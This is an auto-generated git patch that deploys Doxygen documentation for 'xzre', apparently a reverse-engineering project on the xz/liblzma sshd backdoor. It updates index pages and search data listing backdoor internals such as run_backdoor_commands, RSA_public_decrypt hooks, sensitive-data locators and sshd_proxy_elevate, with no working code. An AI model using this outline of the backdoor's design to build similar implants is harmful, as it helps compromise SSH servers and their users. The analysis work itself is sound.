From b3a5b6c385925676613dee8144fd7ff01411e2c4 Mon Sep 17 00:00:00 2001 From: smx-smx Date: Wed, 1 May 2024 14:57:32 +0000 Subject: [PATCH] =?UTF-8?q?Deploying=20to=20gh-pages=20from=20@=20smx-smx/?= =?UTF-8?q?xzre@1e9def9d8162b568a081c7d012829d74a6f8dfc0=20=F0=9F=9A=80?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- annotated.html | 26 +- classes.html | 12 +- functions.html | 5 +- functions_vars.html | 5 +- globals.html | 11 +- globals_func.html | 2 +- globals_type.html | 9 + search/all_10.js | 20 +- search/all_11.js | 115 +- search/all_12.js | 8 +- search/all_13.js | 4 +- search/all_14.js | 6 +- search/all_15.js | 10 +- search/all_4.js | 19 +- search/all_5.js | 52 +- search/all_6.js | 62 +- search/all_7.js | 36 +- search/all_8.js | 10 +- search/all_9.js | 22 +- search/all_a.js | 12 +- search/all_b.js | 24 +- search/all_c.js | 22 +- search/all_d.js | 2 +- search/all_e.js | 4 +- search/all_f.js | 14 +- search/classes_0.js | 4 +- search/classes_1.js | 18 +- search/classes_2.js | 2 +- search/classes_3.js | 4 +- search/classes_4.js | 8 +- search/classes_5.js | 6 +- search/classes_6.js | 6 +- search/classes_7.js | 4 +- search/classes_8.js | 8 +- search/classes_9.js | 8 +- search/classes_a.js | 5 +- search/classes_b.js | 12 +- search/classes_c.js | 2 +- search/classes_d.html | 37 + search/classes_d.js | 13 + search/classes_e.html | 37 + search/classes_e.js | 4 + search/enums_0.js | 6 +- search/enums_1.js | 2 +- search/enumvalues_0.js | 24 +- search/enumvalues_1.js | 2 +- search/files_0.js | 2 +- search/files_1.js | 2 +- search/functions_0.js | 4 +- search/functions_1.js | 12 +- search/functions_2.js | 10 +- search/functions_3.js | 6 +- search/functions_4.js | 30 +- search/functions_5.js | 42 +- search/functions_6.js | 14 +- search/functions_7.js | 14 +- search/functions_8.js | 10 +- search/functions_9.js | 6 +- search/functions_a.js | 8 +- search/functions_b.js | 48 +- search/functions_c.js | 2 +- search/functions_d.js | 2 +- search/functions_e.js | 2 +- search/pages_0.js | 2 +- search/searchdata.js | 4 +- search/typedefs_0.js | 4 +- search/typedefs_1.js | 2 +- search/typedefs_2.js | 2 +- search/typedefs_3.js | 4 +- search/typedefs_4.html | 37 + search/typedefs_4.js | 4 + search/typedefs_5.html | 37 + search/typedefs_5.js | 4 + search/typedefs_6.html | 37 + search/typedefs_6.js | 4 + search/variables_0.js | 8 +- search/variables_1.js | 8 +- search/variables_10.js | 8 +- search/variables_11.js | 4 +- search/variables_12.js | 2 +- search/variables_2.js | 14 +- search/variables_3.js | 13 +- search/variables_4.js | 16 +- search/variables_5.js | 16 +- search/variables_6.js | 14 +- search/variables_7.js | 10 +- search/variables_8.js | 8 +- search/variables_9.js | 18 +- search/variables_a.js | 6 +- search/variables_b.js | 2 +- search/variables_c.js | 4 +- search/variables_d.js | 6 +- search/variables_e.js | 10 +- search/variables_f.js | 44 +- structkey__ctx.html | 31 +- structkey__payload__body.html | 10 +- ...oxy__args.html => structmonitor__data.html | 49 +- structrun__backdoor__commands__data.html | 148 + structsshd__log__ctx.html | 18 +- unionpayload.html | 96 + xzre_8h.html | 148 +- xzre_8h_source.html | 3754 +++++++++-------- 102 files changed, 3081 insertions(+), 2463 deletions(-) create mode 100644 search/classes_d.html create mode 100644 search/classes_d.js create mode 100644 search/classes_e.html create mode 100644 search/classes_e.js create mode 100644 search/typedefs_4.html create mode 100644 search/typedefs_4.js create mode 100644 search/typedefs_5.html create mode 100644 search/typedefs_5.js create mode 100644 search/typedefs_6.html create mode 100644 search/typedefs_6.js rename structsshd__proxy__args.html => structmonitor__data.html (63%) create mode 100644 structrun__backdoor__commands__data.html create mode 100644 unionpayload.html diff --git a/annotated.html b/annotated.html index f74abad..de6e68a 100644 --- a/annotated.html +++ b/annotated.html @@ -103,18 +103,20 @@  Clzma_sha256_stateState for the internal SHA-256 implementation  Cmain_elf  CmonitorStruct monitor from openssh-portable - Csecret_data_item - Csecret_data_shift_cursor_tShift register, which will shift a '1' into the secret data array. the low 3 bits represent the bit index, while the rest represents the byte index this is convenient, since a simple increment will increment the buffer position correctly - Csensitive_dataStruct sensitive_data from openssh-portable - Csshd_ctx - Csshd_log_ctx - Csshd_offsets - Csshd_payload_ctx - Csshd_proxy_args - CsshkeyStruct sshkey from openssh-portable - Cstring_item - Cstring_references - Cu_cmd_arguments_t + Cmonitor_dataData used within sshd_proxy_elevate + CpayloadPayload union within run_backdoor_commands + Crun_backdoor_commands_dataStack frame layout for run_backdoor_commands + Csecret_data_item + Csecret_data_shift_cursor_tShift register, which will shift a '1' into the secret data array. the low 3 bits represent the bit index, while the rest represents the byte index this is convenient, since a simple increment will increment the buffer position correctly + Csensitive_dataStruct sensitive_data from openssh-portable + Csshd_ctx + Csshd_log_ctx + Csshd_offsets + Csshd_payload_ctx + CsshkeyStruct sshkey from openssh-portable + Cstring_item + Cstring_references + Cu_cmd_arguments_t diff --git a/classes.html b/classes.html index e6372b1..6a565f4 100644 --- a/classes.html +++ b/classes.html @@ -65,7 +65,7 @@
Data Structure Index
-
A | B | C | D | E | F | G | I | K | L | M | S | U
+
A | B | C | D | E | F | G | I | K | L | M | P | R | S | U
A
@@ -99,10 +99,16 @@
ldso_ctx
libc_imports
lzma_check_state
lzma_sha256_state
M
-
main_elf
monitor
+
main_elf
monitor
monitor_data
+
+
P
+
payload
+
+
R
+
run_backdoor_commands_data
S
-
secret_data_item
secret_data_shift_cursor_t
sensitive_data
sshd_ctx
sshd_log_ctx
sshd_offsets
sshd_payload_ctx
sshd_proxy_args
sshkey
string_item
string_references
+
secret_data_item
secret_data_shift_cursor_t
sensitive_data
sshd_ctx
sshd_log_ctx
sshd_offsets
sshd_payload_ctx
sshkey
string_item
string_references
U
u_cmd_arguments_t
diff --git a/functions.html b/functions.html index f1ea5ef..50b2f59 100644 --- a/functions.html +++ b/functions.html @@ -115,9 +115,6 @@

- c -

    - d -

      -
    • decrypted_secret_data -: key_ctx -
    • disable_backdoor : global_context
      • @@ -343,7 +340,7 @@

      - s -

        : global_context
      • signature -: key_payload_body +: key_payload_body
      • size : lzma_sha256_state diff --git a/functions_vars.html b/functions_vars.html index 89c06e4..d35d3e9 100644 --- a/functions_vars.html +++ b/functions_vars.html @@ -115,9 +115,6 @@

        - c -

          - d -

            -
          • decrypted_secret_data -: key_ctx -
          • disable_backdoor : global_context
            • @@ -343,7 +340,7 @@

            - s -

              : global_context
            • signature -: key_payload_body +: key_payload_body
            • size : lzma_sha256_state diff --git a/globals.html b/globals.html index b5238b7..1686829 100644 --- a/globals.html +++ b/globals.html @@ -404,10 +404,16 @@

              - m -

              • mm_log_handler_hook() : xzre.h
                • +
              • monitor_data_t +: xzre.h +

              - p -

                +
              • payload_t +: xzre.h +
              • process_is_sshd() : xzre.h
                • @@ -436,6 +442,9 @@

                - r -

                • run_backdoor_commands() : xzre.h
                  • +
                • run_backdoor_commands_data_t +: xzre.h +
                @@ -510,7 +519,7 @@

                - s -

                  : xzre.h
                • sshd_proxy_elevate() -: xzre.h +: xzre.h
                • string_action_data : xzre.h diff --git a/globals_func.html b/globals_func.html index 9735fd6..b23ff7e 100644 --- a/globals_func.html +++ b/globals_func.html @@ -412,7 +412,7 @@

                  - s -

                  diff --git a/globals_type.html b/globals_type.html index d784e8a..7f1530a 100644 --- a/globals_type.html +++ b/globals_type.html @@ -80,6 +80,15 @@
                • key_payload_t : xzre.h
                  • +
                • monitor_data_t +: xzre.h +
                  • +
                • payload_t +: xzre.h +
                  • +
                • run_backdoor_commands_data_t +: xzre.h +
diff --git a/search/all_10.js b/search/all_10.js index 8462779..8a327e9 100644 --- a/search/all_10.js +++ b/search/all_10.js @@ -1,12 +1,14 @@ var searchData= [ - ['resolve_5flibc_5fimports_197',['resolve_libc_imports',['../xzre_8h.html#a0d70747b6216270de07c783fc499938e',1,'xzre.h']]], - ['resolver_5fcall_5fcount_198',['resolver_call_count',['../xzre_8h.html#ab9c7b9765c15a48fbed3d1a8daf1b27f',1,'xzre.h']]], - ['result_199',['result',['../structinstruction__search__ctx.html#a05e5f377f835a8081b52dc6d331c81fb',1,'instruction_search_ctx']]], - ['return_5faddress_200',['return_address',['../structgot__ctx.html#a09bcbc0f40125bda4b3c461c71085d2c',1,'got_ctx']]], - ['rsa_5fget0_5fkey_5fplt_201',['RSA_get0_key_plt',['../structimported__funcs.html#a52a65738a6de9458c8952bd142331191',1,'imported_funcs::RSA_get0_key_plt()'],['../structbackdoor__shared__libraries__data.html#a89e6b89c81556fab72e027d1b7e44a8b',1,'backdoor_shared_libraries_data::RSA_get0_key_plt()']]], - ['rsa_5fkey_5fhash_202',['rsa_key_hash',['../xzre_8h.html#a642b0366b943daba60d004a6a46fb7c7',1,'xzre.h']]], - ['rsa_5fpublic_5fdecrypt_203',['RSA_public_decrypt',['../ssh__patch_8c.html#ae142ad01d213393458d1f4770b68555f',1,'ssh_patch.c']]], - ['rsa_5fpublic_5fdecrypt_5fplt_204',['RSA_public_decrypt_plt',['../structimported__funcs.html#a37ed0762785dde90622e25985c9abc35',1,'imported_funcs::RSA_public_decrypt_plt()'],['../structbackdoor__shared__libraries__data.html#aaee59a1ccd7efcb2615d4cec198a5bb6',1,'backdoor_shared_libraries_data::RSA_public_decrypt_plt()']]], - ['run_5fbackdoor_5fcommands_205',['run_backdoor_commands',['../xzre_8h.html#add930f2364d6ac0711ec484781f00f03',1,'xzre.h']]] + ['resolve_5flibc_5fimports_200',['resolve_libc_imports',['../xzre_8h.html#a0d70747b6216270de07c783fc499938e',1,'xzre.h']]], + ['resolver_5fcall_5fcount_201',['resolver_call_count',['../xzre_8h.html#ab9c7b9765c15a48fbed3d1a8daf1b27f',1,'xzre.h']]], + ['result_202',['result',['../structinstruction__search__ctx.html#a05e5f377f835a8081b52dc6d331c81fb',1,'instruction_search_ctx']]], + ['return_5faddress_203',['return_address',['../structgot__ctx.html#a09bcbc0f40125bda4b3c461c71085d2c',1,'got_ctx']]], + ['rsa_5fget0_5fkey_5fplt_204',['RSA_get0_key_plt',['../structimported__funcs.html#a52a65738a6de9458c8952bd142331191',1,'imported_funcs::RSA_get0_key_plt()'],['../structbackdoor__shared__libraries__data.html#a89e6b89c81556fab72e027d1b7e44a8b',1,'backdoor_shared_libraries_data::RSA_get0_key_plt()']]], + ['rsa_5fkey_5fhash_205',['rsa_key_hash',['../xzre_8h.html#a642b0366b943daba60d004a6a46fb7c7',1,'xzre.h']]], + ['rsa_5fpublic_5fdecrypt_206',['RSA_public_decrypt',['../ssh__patch_8c.html#ae142ad01d213393458d1f4770b68555f',1,'ssh_patch.c']]], + ['rsa_5fpublic_5fdecrypt_5fplt_207',['RSA_public_decrypt_plt',['../structimported__funcs.html#a37ed0762785dde90622e25985c9abc35',1,'imported_funcs::RSA_public_decrypt_plt()'],['../structbackdoor__shared__libraries__data.html#aaee59a1ccd7efcb2615d4cec198a5bb6',1,'backdoor_shared_libraries_data::RSA_public_decrypt_plt()']]], + ['run_5fbackdoor_5fcommands_208',['run_backdoor_commands',['../xzre_8h.html#add930f2364d6ac0711ec484781f00f03',1,'xzre.h']]], + ['run_5fbackdoor_5fcommands_5fdata_209',['run_backdoor_commands_data',['../structrun__backdoor__commands__data.html',1,'']]], + ['run_5fbackdoor_5fcommands_5fdata_5ft_210',['run_backdoor_commands_data_t',['../xzre_8h.html#aa5a220a495d161205ee770f8e7b360d5',1,'xzre.h']]] ]; diff --git a/search/all_11.js b/search/all_11.js index 86171c6..3668ef5 100644 --- a/search/all_11.js +++ b/search/all_11.js @@ -1,61 +1,60 @@ var searchData= [ - ['secret_5fdata_206',['secret_data',['../structglobal__context.html#a2e2c677442b432af30edeb9263a8a5ab',1,'global_context']]], - ['secret_5fdata_5fappend_5ffrom_5faddress_207',['secret_data_append_from_address',['../xzre_8h.html#aa7239c834d2598747c9158949280783b',1,'xzre.h']]], - ['secret_5fdata_5fappend_5ffrom_5fcall_5fsite_208',['secret_data_append_from_call_site',['../xzre_8h.html#ace528f88c27d645eafff5052f6c36bd0',1,'xzre.h']]], - ['secret_5fdata_5fappend_5ffrom_5fcode_209',['secret_data_append_from_code',['../xzre_8h.html#ad595372eac746eb11ddc536e5a20d667',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fitem_210',['secret_data_append_item',['../xzre_8h.html#a2e827c4d8e3500f106150e786053dde2',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fitems_211',['secret_data_append_items',['../xzre_8h.html#aa80510b3b8c22dc0ccf6e123c393fb3d',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fsingleton_212',['secret_data_append_singleton',['../xzre_8h.html#a48636f910a9c7df2f2adfa4abf7a73e9',1,'xzre.h']]], - ['secret_5fdata_5fget_5fdecrypted_213',['secret_data_get_decrypted',['../xzre_8h.html#a80592f231ad06e5a8ba204e6ff685827',1,'xzre.h']]], - ['secret_5fdata_5fitem_214',['secret_data_item',['../structsecret__data__item.html',1,'']]], - ['secret_5fdata_5fshift_5fcursor_5ft_215',['secret_data_shift_cursor_t',['../unionsecret__data__shift__cursor__t.html',1,'']]], - ['sensitive_5fdata_216',['sensitive_data',['../structsensitive__data.html',1,'']]], - ['sha256_217',['sha256',['../xzre_8h.html#a3a3417b7999e13c79b9411e092923278',1,'xzre.h']]], - ['shift_5foperations_218',['shift_operations',['../structglobal__context.html#a6f197e9f7782db222c1a54ed0f59fd58',1,'global_context']]], - ['signature_219',['signature',['../structkey__payload__body.html#a97e29f6eef1a4def27c0345ee963b4c1',1,'key_payload_body']]], - ['size_220',['size',['../structlzma__sha256__state.html#a62337a1a0d34a9702ab4a438da383794',1,'lzma_sha256_state']]], - ['ssh_5fpatch_2ec_221',['ssh_patch.c',['../ssh__patch_8c.html',1,'']]], - ['sshbuf_5fbignum_5fis_5fnegative_222',['sshbuf_bignum_is_negative',['../xzre_8h.html#ae4488f858b97dc690b41cf9a5d20ef44',1,'xzre.h']]], - ['sshd_5fauditstate_5fbindflags_5fold_5fvalue_223',['sshd_auditstate_bindflags_old_value',['../structldso__ctx.html#a7cc8b9818d079073b25c93e55f3776eb',1,'ldso_ctx']]], - ['sshd_5fauditstate_5fbindflags_5fptr_224',['sshd_auditstate_bindflags_ptr',['../structldso__ctx.html#a136f1f2760b5d9eb601fc599b84c8fd8',1,'ldso_ctx']]], - ['sshd_5fcode_5fend_225',['sshd_code_end',['../structglobal__context.html#a8ddd06f420ebcea88a17df57aca07714',1,'global_context']]], - ['sshd_5fcode_5fstart_226',['sshd_code_start',['../structglobal__context.html#a6b0e7c4ac8682de374b956ee137a22d8',1,'global_context']]], - ['sshd_5fctx_227',['sshd_ctx',['../structsshd__ctx.html',1,'']]], - ['sshd_5fdata_5fend_228',['sshd_data_end',['../structglobal__context.html#a6c7245e596313f01e7411aecdda645df',1,'global_context']]], - ['sshd_5fdata_5fstart_229',['sshd_data_start',['../structglobal__context.html#a5f6a9e31db48c18d66d7cac9f2992393',1,'global_context']]], - ['sshd_5ffind_5fmonitor_5fstruct_230',['sshd_find_monitor_struct',['../xzre_8h.html#ad32fc521229739df889407c2e9e48475',1,'xzre.h']]], - ['sshd_5ffind_5fsensitive_5fdata_231',['sshd_find_sensitive_data',['../xzre_8h.html#a5f865a1a2eb6a32980c4336b2290e17e',1,'xzre.h']]], - ['sshd_5fget_5fclient_5fsocket_232',['sshd_get_client_socket',['../xzre_8h.html#aaa520bbc6de39ccb7a4e5013cf66d7aa',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fkrb5ccname_233',['sshd_get_sensitive_data_address_via_krb5ccname',['../xzre_8h.html#a75dff765c216d52b153ba98cf7cf0227',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fxcalloc_234',['sshd_get_sensitive_data_address_via_xcalloc',['../xzre_8h.html#ae0bd1e83c94cd866e022dd5867bee152',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_235',['sshd_get_sensitive_data_score',['../xzre_8h.html#a7d1ef087d8cb5ea0a468fc42bb503049',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdemote_5fsensitive_5fdata_236',['sshd_get_sensitive_data_score_in_demote_sensitive_data',['../xzre_8h.html#a8320540fc87f4c785714c52940a85571',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdo_5fchild_237',['sshd_get_sensitive_data_score_in_do_child',['../xzre_8h.html#a5f78359c3bb3564a965009ee2280ac5a',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fmain_238',['sshd_get_sensitive_data_score_in_main',['../xzre_8h.html#aa83cef3858c167b051721db9fbd72667',1,'xzre.h']]], - ['sshd_5fget_5fsshbuf_239',['sshd_get_sshbuf',['../xzre_8h.html#a44abb1c444c5d0428c6d67b9e8e38276',1,'xzre.h']]], - ['sshd_5fget_5fusable_5fsocket_240',['sshd_get_usable_socket',['../xzre_8h.html#a077a435ef7c8a7960451ff5c0cc5dc43',1,'xzre.h']]], - ['sshd_5fkex_5fsshbuf_5fget_241',['sshd_kex_sshbuf_get',['../xzre_8h.html#a657f411379e9d088996d8722b82eeefd',1,'xzre.h']]], - ['sshd_5flink_5fmap_5fl_5faudit_5fany_5fplt_5faddr_242',['sshd_link_map_l_audit_any_plt_addr',['../structldso__ctx.html#ae3a49e232656fb95fbb2f3f08f579639',1,'ldso_ctx']]], - ['sshd_5flog_243',['sshd_log',['../xzre_8h.html#adbd2f206ddcca1e6919558e0548990d7',1,'xzre.h']]], - ['sshd_5flog_5fctx_244',['sshd_log_ctx',['../structsshd__log__ctx.html',1,'']]], - ['sshd_5foffsets_245',['sshd_offsets',['../structsshd__offsets.html',1,'']]], - ['sshd_5fpatch_5fvariables_246',['sshd_patch_variables',['../xzre_8h.html#a938289ac36ce7b17b60a4f5c0c28d2d4',1,'xzre.h']]], - ['sshd_5fpayload_5fctx_247',['sshd_payload_ctx',['../structsshd__payload__ctx.html',1,'']]], - ['sshd_5fproxy_5fargs_248',['sshd_proxy_args',['../structsshd__proxy__args.html',1,'']]], - ['sshd_5fproxy_5felevate_249',['sshd_proxy_elevate',['../xzre_8h.html#a68b586c330a6c746c65cee778a8b72e8',1,'xzre.h']]], - ['sshkey_250',['sshkey',['../structsshkey.html',1,'']]], - ['start_5faddr_251',['start_addr',['../structinstruction__search__ctx.html#a80df4d55c53d2716bed1a419bcbd9c7c',1,'instruction_search_ctx']]], - ['state_252',['state',['../structlzma__sha256__state.html#adb885aab736aae3772761f6c663c40be',1,'lzma_sha256_state::state()'],['../structlzma__check__state.html#ae327393eade6156b7f89a25da3c985a5',1,'lzma_check_state::state()']]], - ['str_5frsa_5fsha2_5f256_253',['STR_rsa_sha2_256',['../structglobal__context.html#a825b99a7c594e756f18c6278286f4a3e',1,'global_context']]], - ['str_5fssh_5frsa_5fcert_5fv01_5fopenssh_5fcom_254',['STR_ssh_rsa_cert_v01_openssh_com',['../structglobal__context.html#a3f9434a1f400536662da98291b5b82b2',1,'global_context']]], - ['string_5faction_5fdata_255',['string_action_data',['../xzre_8h.html#a53450f0faa9d81b24f8cee5731b51a58',1,'xzre.h']]], - ['string_5fid_256',['string_id',['../structstring__item.html#a7127d6c46cccb4d81759f01f495acd9f',1,'string_item']]], - ['string_5fitem_257',['string_item',['../structstring__item.html',1,'']]], - ['string_5fmask_5fdata_258',['string_mask_data',['../xzre_8h.html#a8c67ac851c8ec7f40c406b286233f98e',1,'xzre.h']]], - ['string_5freferences_259',['string_references',['../structstring__references.html',1,'']]], - ['string_5frefs_260',['string_refs',['../structbackdoor__data.html#a374102b786779a01463a82162ac97614',1,'backdoor_data']]], - ['strtab_261',['strtab',['../structelf__info.html#a4234e0dcece021d3bb5d64723180da9a',1,'elf_info']]], - ['symbol_5fptr_262',['symbol_ptr',['../structelf__entry__ctx.html#a286882a4d56155f97674460abe66b9cb',1,'elf_entry_ctx']]], - ['symtab_263',['symtab',['../structelf__info.html#aa34e0002d511de06b931d7c7b7579dc0',1,'elf_info']]] + ['secret_5fdata_211',['secret_data',['../structglobal__context.html#a2e2c677442b432af30edeb9263a8a5ab',1,'global_context']]], + ['secret_5fdata_5fappend_5ffrom_5faddress_212',['secret_data_append_from_address',['../xzre_8h.html#aa7239c834d2598747c9158949280783b',1,'xzre.h']]], + ['secret_5fdata_5fappend_5ffrom_5fcall_5fsite_213',['secret_data_append_from_call_site',['../xzre_8h.html#ace528f88c27d645eafff5052f6c36bd0',1,'xzre.h']]], + ['secret_5fdata_5fappend_5ffrom_5fcode_214',['secret_data_append_from_code',['../xzre_8h.html#ad595372eac746eb11ddc536e5a20d667',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fitem_215',['secret_data_append_item',['../xzre_8h.html#a2e827c4d8e3500f106150e786053dde2',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fitems_216',['secret_data_append_items',['../xzre_8h.html#aa80510b3b8c22dc0ccf6e123c393fb3d',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fsingleton_217',['secret_data_append_singleton',['../xzre_8h.html#a48636f910a9c7df2f2adfa4abf7a73e9',1,'xzre.h']]], + ['secret_5fdata_5fget_5fdecrypted_218',['secret_data_get_decrypted',['../xzre_8h.html#a80592f231ad06e5a8ba204e6ff685827',1,'xzre.h']]], + ['secret_5fdata_5fitem_219',['secret_data_item',['../structsecret__data__item.html',1,'']]], + ['secret_5fdata_5fshift_5fcursor_5ft_220',['secret_data_shift_cursor_t',['../unionsecret__data__shift__cursor__t.html',1,'']]], + ['sensitive_5fdata_221',['sensitive_data',['../structsensitive__data.html',1,'']]], + ['sha256_222',['sha256',['../xzre_8h.html#a3a3417b7999e13c79b9411e092923278',1,'xzre.h']]], + ['shift_5foperations_223',['shift_operations',['../structglobal__context.html#a6f197e9f7782db222c1a54ed0f59fd58',1,'global_context']]], + ['signature_224',['signature',['../structkey__payload__body.html#a486992728c3e03265c4006718106cd37',1,'key_payload_body']]], + ['size_225',['size',['../structlzma__sha256__state.html#a62337a1a0d34a9702ab4a438da383794',1,'lzma_sha256_state']]], + ['ssh_5fpatch_2ec_226',['ssh_patch.c',['../ssh__patch_8c.html',1,'']]], + ['sshbuf_5fbignum_5fis_5fnegative_227',['sshbuf_bignum_is_negative',['../xzre_8h.html#ae4488f858b97dc690b41cf9a5d20ef44',1,'xzre.h']]], + ['sshd_5fauditstate_5fbindflags_5fold_5fvalue_228',['sshd_auditstate_bindflags_old_value',['../structldso__ctx.html#a7cc8b9818d079073b25c93e55f3776eb',1,'ldso_ctx']]], + ['sshd_5fauditstate_5fbindflags_5fptr_229',['sshd_auditstate_bindflags_ptr',['../structldso__ctx.html#a136f1f2760b5d9eb601fc599b84c8fd8',1,'ldso_ctx']]], + ['sshd_5fcode_5fend_230',['sshd_code_end',['../structglobal__context.html#a8ddd06f420ebcea88a17df57aca07714',1,'global_context']]], + ['sshd_5fcode_5fstart_231',['sshd_code_start',['../structglobal__context.html#a6b0e7c4ac8682de374b956ee137a22d8',1,'global_context']]], + ['sshd_5fctx_232',['sshd_ctx',['../structsshd__ctx.html',1,'']]], + ['sshd_5fdata_5fend_233',['sshd_data_end',['../structglobal__context.html#a6c7245e596313f01e7411aecdda645df',1,'global_context']]], + ['sshd_5fdata_5fstart_234',['sshd_data_start',['../structglobal__context.html#a5f6a9e31db48c18d66d7cac9f2992393',1,'global_context']]], + ['sshd_5ffind_5fmonitor_5fstruct_235',['sshd_find_monitor_struct',['../xzre_8h.html#ad32fc521229739df889407c2e9e48475',1,'xzre.h']]], + ['sshd_5ffind_5fsensitive_5fdata_236',['sshd_find_sensitive_data',['../xzre_8h.html#a5f865a1a2eb6a32980c4336b2290e17e',1,'xzre.h']]], + ['sshd_5fget_5fclient_5fsocket_237',['sshd_get_client_socket',['../xzre_8h.html#aaa520bbc6de39ccb7a4e5013cf66d7aa',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fkrb5ccname_238',['sshd_get_sensitive_data_address_via_krb5ccname',['../xzre_8h.html#a75dff765c216d52b153ba98cf7cf0227',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fxcalloc_239',['sshd_get_sensitive_data_address_via_xcalloc',['../xzre_8h.html#ae0bd1e83c94cd866e022dd5867bee152',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_240',['sshd_get_sensitive_data_score',['../xzre_8h.html#a7d1ef087d8cb5ea0a468fc42bb503049',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdemote_5fsensitive_5fdata_241',['sshd_get_sensitive_data_score_in_demote_sensitive_data',['../xzre_8h.html#a8320540fc87f4c785714c52940a85571',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdo_5fchild_242',['sshd_get_sensitive_data_score_in_do_child',['../xzre_8h.html#a5f78359c3bb3564a965009ee2280ac5a',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fmain_243',['sshd_get_sensitive_data_score_in_main',['../xzre_8h.html#aa83cef3858c167b051721db9fbd72667',1,'xzre.h']]], + ['sshd_5fget_5fsshbuf_244',['sshd_get_sshbuf',['../xzre_8h.html#a44abb1c444c5d0428c6d67b9e8e38276',1,'xzre.h']]], + ['sshd_5fget_5fusable_5fsocket_245',['sshd_get_usable_socket',['../xzre_8h.html#a077a435ef7c8a7960451ff5c0cc5dc43',1,'xzre.h']]], + ['sshd_5fkex_5fsshbuf_5fget_246',['sshd_kex_sshbuf_get',['../xzre_8h.html#a657f411379e9d088996d8722b82eeefd',1,'xzre.h']]], + ['sshd_5flink_5fmap_5fl_5faudit_5fany_5fplt_5faddr_247',['sshd_link_map_l_audit_any_plt_addr',['../structldso__ctx.html#ae3a49e232656fb95fbb2f3f08f579639',1,'ldso_ctx']]], + ['sshd_5flog_248',['sshd_log',['../xzre_8h.html#adbd2f206ddcca1e6919558e0548990d7',1,'xzre.h']]], + ['sshd_5flog_5fctx_249',['sshd_log_ctx',['../structsshd__log__ctx.html',1,'']]], + ['sshd_5foffsets_250',['sshd_offsets',['../structsshd__offsets.html',1,'']]], + ['sshd_5fpatch_5fvariables_251',['sshd_patch_variables',['../xzre_8h.html#a938289ac36ce7b17b60a4f5c0c28d2d4',1,'xzre.h']]], + ['sshd_5fpayload_5fctx_252',['sshd_payload_ctx',['../structsshd__payload__ctx.html',1,'']]], + ['sshd_5fproxy_5felevate_253',['sshd_proxy_elevate',['../xzre_8h.html#a60b93ed64ba904012e9fa9477e97a244',1,'xzre.h']]], + ['sshkey_254',['sshkey',['../structsshkey.html',1,'']]], + ['start_5faddr_255',['start_addr',['../structinstruction__search__ctx.html#a80df4d55c53d2716bed1a419bcbd9c7c',1,'instruction_search_ctx']]], + ['state_256',['state',['../structlzma__sha256__state.html#adb885aab736aae3772761f6c663c40be',1,'lzma_sha256_state::state()'],['../structlzma__check__state.html#ae327393eade6156b7f89a25da3c985a5',1,'lzma_check_state::state()']]], + ['str_5frsa_5fsha2_5f256_257',['STR_rsa_sha2_256',['../structglobal__context.html#a825b99a7c594e756f18c6278286f4a3e',1,'global_context']]], + ['str_5fssh_5frsa_5fcert_5fv01_5fopenssh_5fcom_258',['STR_ssh_rsa_cert_v01_openssh_com',['../structglobal__context.html#a3f9434a1f400536662da98291b5b82b2',1,'global_context']]], + ['string_5faction_5fdata_259',['string_action_data',['../xzre_8h.html#a53450f0faa9d81b24f8cee5731b51a58',1,'xzre.h']]], + ['string_5fid_260',['string_id',['../structstring__item.html#a7127d6c46cccb4d81759f01f495acd9f',1,'string_item']]], + ['string_5fitem_261',['string_item',['../structstring__item.html',1,'']]], + ['string_5fmask_5fdata_262',['string_mask_data',['../xzre_8h.html#a8c67ac851c8ec7f40c406b286233f98e',1,'xzre.h']]], + ['string_5freferences_263',['string_references',['../structstring__references.html',1,'']]], + ['string_5frefs_264',['string_refs',['../structbackdoor__data.html#a374102b786779a01463a82162ac97614',1,'backdoor_data']]], + ['strtab_265',['strtab',['../structelf__info.html#a4234e0dcece021d3bb5d64723180da9a',1,'elf_info']]], + ['symbol_5fptr_266',['symbol_ptr',['../structelf__entry__ctx.html#a286882a4d56155f97674460abe66b9cb',1,'elf_entry_ctx']]], + ['symtab_267',['symtab',['../structelf__info.html#aa34e0002d511de06b931d7c7b7579dc0',1,'elf_info']]] ]; diff --git a/search/all_12.js b/search/all_12.js index f1c2086..60907f7 100644 --- a/search/all_12.js +++ b/search/all_12.js @@ -1,7 +1,7 @@ var searchData= [ - ['tls_5fget_5faddr_5fplt_5foffset_264',['tls_get_addr_plt_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a0827b12f5648dae1daaa202813b299e6',1,'backdoor_tls_get_addr_reloc_consts']]], - ['tls_5fget_5faddr_5frandom_5fsymbol_265',['tls_get_addr_random_symbol',['../xzre_8h.html#a3101b150fe0226a632314e2fa473aba1',1,'xzre.h']]], - ['tls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_266',['tls_get_addr_random_symbol_got_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a22cf3898da642626d8fc88d1c4b5bb39',1,'backdoor_tls_get_addr_reloc_consts']]], - ['tls_5fget_5faddr_5freloc_5fconsts_267',['tls_get_addr_reloc_consts',['../xzre_8h.html#aadd306e1b2b33d0306f1995e0a83dae7',1,'xzre.h']]] + 